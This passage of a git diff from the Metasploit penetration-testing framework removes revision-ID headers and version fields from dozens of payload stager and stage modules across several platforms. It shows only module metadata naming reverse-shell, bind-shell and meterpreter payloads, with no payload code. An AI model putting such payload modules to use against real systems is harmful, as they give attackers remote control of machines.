restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection over IPv6', 'Author' => [ 'kris katterjohn', # original diff --git a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb index d91e3e554b..98d116b415 100644 --- a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb index 9561966bed..ddf1aa9a24 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => [ 'skape', # original diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index aa33fdaed1..11bd5b381f 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Find Tag Stager', - 'Version' => '$Revision$', 'Description' => 'Use an established connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb index b6e7e1f1a5..e133d29c51 100644 --- a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker over IPv6', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb index 23f6188d1b..8b0dc22abb 100644 --- a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 54aa746ccd..53da3eeb00 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => [ 'skape', # original diff --git a/modules/payloads/stagers/netware/reverse_tcp.rb b/modules/payloads/stagers/netware/reverse_tcp.rb index f6c86c0d4c..c4b9316b15 100644 --- a/modules/payloads/stagers/netware/reverse_tcp.rb +++ b/modules/payloads/stagers/netware/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'toto', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/armle/bind_tcp.rb b/modules/payloads/stagers/osx/armle/bind_tcp.rb index 190747fa61..dc4b32c2bf 100644 --- a/modules/payloads/stagers/osx/armle/bind_tcp.rb +++ b/modules/payloads/stagers/osx/armle/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/armle/reverse_tcp.rb b/modules/payloads/stagers/osx/armle/reverse_tcp.rb index 9a03ce2cfe..b625c22156 100644 --- a/modules/payloads/stagers/osx/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/armle/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/ppc/bind_tcp.rb b/modules/payloads/stagers/osx/ppc/bind_tcp.rb index 4fcdc72f98..881c3c4fc6 100644 --- a/modules/payloads/stagers/osx/ppc/bind_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/ppc/find_tag.rb b/modules/payloads/stagers/osx/ppc/find_tag.rb index 9fb8abf6c0..e929d86a13 100644 --- a/modules/payloads/stagers/osx/ppc/find_tag.rb +++ b/modules/payloads/stagers/osx/ppc/find_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Find Tag Stager', - 'Version' => '$Revision$', 'Description' => 'Use an established connection', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb index 155ceab391..9f53a20067 100644 --- a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb index 99174393eb..98dcbec86d 100644 --- a/modules/payloads/stagers/osx/x64/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb @@ -15,7 +15,6 @@ module Metasploit3 def initialize(info = { }) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen, read length, read buffer, execute', 'Author' => 'nemo ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb index 0370a881ba..186a880054 100644 --- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb @@ -15,7 +15,6 @@ module Metasploit3 def initialize(info = { }) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect, read length, read buffer, execute', 'Author' => 'nemo ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/x86/bind_tcp.rb b/modules/payloads/stagers/osx/x86/bind_tcp.rb index 3e9e24862e..88c8a78f84 100644 --- a/modules/payloads/stagers/osx/x86/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x86/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ module Metasploit3 def initialize(info = { }) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen, read length, read buffer, execute', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/x86/reverse_tcp.rb b/modules/payloads/stagers/osx/x86/reverse_tcp.rb index bff4834aba..f50f918eea 100644 --- a/modules/payloads/stagers/osx/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x86/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ module Metasploit3 def initialize(info = { }) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect, read length, read buffer, execute', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb index f2b5c65c65..0567e4dfcb 100644 --- a/modules/payloads/stagers/php/bind_tcp.rb +++ b/modules/payloads/stagers/php/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => ['egypt'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb index 859029e0d7..b5788486b0 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection over IPv6', 'Author' => ['egypt'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb index e6b8632d85..0ccb5ee617 100644 --- a/modules/payloads/stagers/php/reverse_tcp.rb +++ b/modules/payloads/stagers/php/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Reverse PHP connect back stager with checks for disabled functions', 'Author' => 'egypt', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb index 1d36fc269f..9ddd30dec0 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection over IPv6', 'Author' => ['hdm', 'skape'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/bind_nonx_tcp.rb b/modules/payloads/stagers/windows/bind_nonx_tcp.rb index 4810def391..f0cc04dfa9 100644 --- a/modules/payloads/stagers/windows/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/bind_nonx_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (No NX or Win7)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection (No NX)', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index c26415a868..8192c104b9 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => ['hdm', 'skape', 'sf'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/findtag_ord.rb b/modules/payloads/stagers/windows/findtag_ord.rb index 0ce7bcbd50..13e1ce4f6f 100644 --- a/modules/payloads/stagers/windows/findtag_ord.rb +++ b/modules/payloads/stagers/windows/findtag_ord.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Find Tag Ordinal Stager', - 'Version' => '$Revision$', 'Description' => 'Use an established connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index bf3acdf39c..10555580aa 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse HTTP Stager', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTP', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index e592a24e24..7de4c88665 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse HTTPS Stager', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTP using SSL', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_ipv6_http.rb b/modules/payloads/stagers/windows/reverse_ipv6_http.rb index 2fd8a9fd1a..a9f4b22f75 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_http.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_http.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse HTTP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTP and IPv6', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_ipv6_https.rb b/modules/payloads/stagers/windows/reverse_ipv6_https.rb index a7a31b363c..b44a445bdf 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_https.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_https.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse HTTPS Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTP using SSL and IPv6', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb index 8cce2af465..f25266394e 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Reverse TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker over IPv6', 'Author' => ['hdm', 'skape', 'sf'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb index 28db7fbeaa..6f3ebb2fab 100644 --- a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager (No NX or Win7)', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker (No NX)', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_ord_tcp.rb b/modules/payloads/stagers/windows/reverse_ord_tcp.rb index 043efe3d60..ee7057c01d 100644 --- a/modules/payloads/stagers/windows/reverse_ord_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ord_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse Ordinal TCP Stager (No NX or Win7)', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'spoonm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index fa7c07b6f2..3b45e5eb59 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => ['hdm', 'skape', 'sf'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb index c127734864..2e78459f1a 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse All-Port TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Try to connect back to the attacker, on all possible ports (1-65535, slowly)', 'Author' => ['hdm', 'skape', 'sf'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_tcp_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_dns.rb index 5221e6855e..9a51eff845 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager (DNS)', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => ['hdm', 'skape', 'sf'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/x64/bind_tcp.rb b/modules/payloads/stagers/windows/x64/bind_tcp.rb index be3a296f0e..d619c1accb 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection (Windows x64)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp.rb b/modules/payloads/stagers/windows/x64/reverse_tcp.rb index b5a9592f4c..29f4ad7906 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker (Windows x64)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/bsd/x86/shell.rb b/modules/payloads/stages/bsd/x86/shell.rb index 4049629969..752933e4e1 100644 --- a/modules/payloads/stages/bsd/x86/shell.rb +++ b/modules/payloads/stages/bsd/x86/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/bsdi/x86/shell.rb b/modules/payloads/stages/bsdi/x86/shell.rb index b82195df4b..5e441d082b 100644 --- a/modules/payloads/stages/bsdi/x86/shell.rb +++ b/modules/payloads/stages/bsdi/x86/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSDi Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/java/meterpreter.rb b/modules/payloads/stages/java/meterpreter.rb index 323a967051..77c52949dd 100644 --- a/modules/payloads/stages/java/meterpreter.rb +++ b/modules/payloads/stages/java/meterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Java Meterpreter', - 'Version' => '$Revision$', 'Description' => 'Run a meterpreter server in Java', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stages/java/shell.rb b/modules/payloads/stages/java/shell.rb index 6e819e6b3b..05dd667fe8 100644 --- a/modules/payloads/stages/java/shell.rb +++ b/modules/payloads/stages/java/shell.rb @@ -1,8 +1,4 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb index 2e3e5d97ba..8ab03efa17 100644 --- a/modules/payloads/stages/linux/x64/shell.rb +++ b/modules/payloads/stages/linux/x64/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index 0cc22ba0fc..d83583fec3 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Linux Meterpreter', - 'Version' => '$Revision$', 'Description' => 'Staged meterpreter server', 'Author' => ['PKS', 'egypt'], 'Platform' => 'linux', diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb index c6d7d0516b..c4a1a98d6d 100644 --- a/modules/payloads/stages/linux/x86/shell.rb +++ b/modules/payloads/stages/linux/x86/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/netware/shell.rb b/modules/payloads/stages/netware/shell.rb index f7d125ecfc..7edafc0aed 100644 --- a/modules/payloads/stages/netware/shell.rb +++ b/modules/payloads/stages/netware/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'NetWare Command Shell', - 'Version' => '$Revision$', 'Description' => 'Connect to the NetWare console (staged)', 'Author' => 'toto', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/armle/execute.rb b/modules/payloads/stages/osx/armle/execute.rb index 87838f405c..af2e938d33 100644 --- a/modules/payloads/stages/osx/armle/execute.rb +++ b/modules/payloads/stages/osx/armle/execute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Write and Execute Binary', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/armle/shell.rb b/modules/payloads/stages/osx/armle/shell.rb index c8531735cb..46c282758b 100644 --- a/modules/payloads/stages/osx/armle/shell.rb +++ b/modules/payloads/stages/osx/armle/shell.rb @@ -1,7 